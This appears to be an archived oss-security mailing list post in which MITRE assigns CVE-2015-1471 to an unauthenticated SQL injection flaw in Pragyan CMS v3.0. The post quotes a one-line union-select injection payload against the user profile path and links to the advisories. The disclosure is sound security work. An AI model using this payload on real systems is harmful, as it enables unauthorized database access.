oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

Re: CVE-Request -- Pragyan CMS v.3.0 -- SQL injection vulnerability

From: cve-assign () mitre org
Date: Tue, 3 Feb 2015 17:54:17 -0500 (EST)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Attackers can exploit that vulnerability by appending arbitrary SQL queries
to a registered users profile id without being authenticated.

/user:1%27+and+1=2+union+select+database%28%29,version%28%29,3+--+

http://sroesemann.blogspot.de/2015/01/sroeadv-2015-11.html
https://github.com/delta/pragyan/issues/206
http://pastebin.com/ip2gGYuS
http://sroesemann.blogspot.de/2015/02/advisory-for-sroeadv-2015-11.html
http://seclists.org/fulldisclosure/2015/Feb/18


Use CVE-2015-1471.

- -- 
CVE assignment team, MITRE CVE Numbering Authority
M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.14 (SunOS)

iQEcBAEBAgAGBQJU0VCfAAoJEKllVAevmvmsI60H/ilF12jFosK4ISdLVWrF13Uq
kh0bzif+CUb7sog+InOQvVKM6V0Ci+39BjIzEkU5EQRWZQyVedMQaRYp7zMkPyUO
aNLOM8DvMGFXrzRE8/ofTUa1Bq1K4vlA46YOfsm2VAbwxvGDkFEHW39sGpJyw1SL
Qn3hrBhGfCdevFXrh8ZKvMmo/rVi4/kAazfZezYNOos4qlTTxLGFljl9rzJVsI8d
v+MhkzD/+0sf/27pUczwLdd8XRfd0qWbTCVq8z1T/s9qKj7sq54uJZQlDsnhpKcC
RLGlsX2EgqzjFOBWEnIlNZw74VYySOkR7ztuyWDRKtz0khhBviFA7ZpDxMqYEE4=
=DrF7
-----END PGP SIGNATURE-----
Previous By Date Next
Previous By Thread Next

Current thread: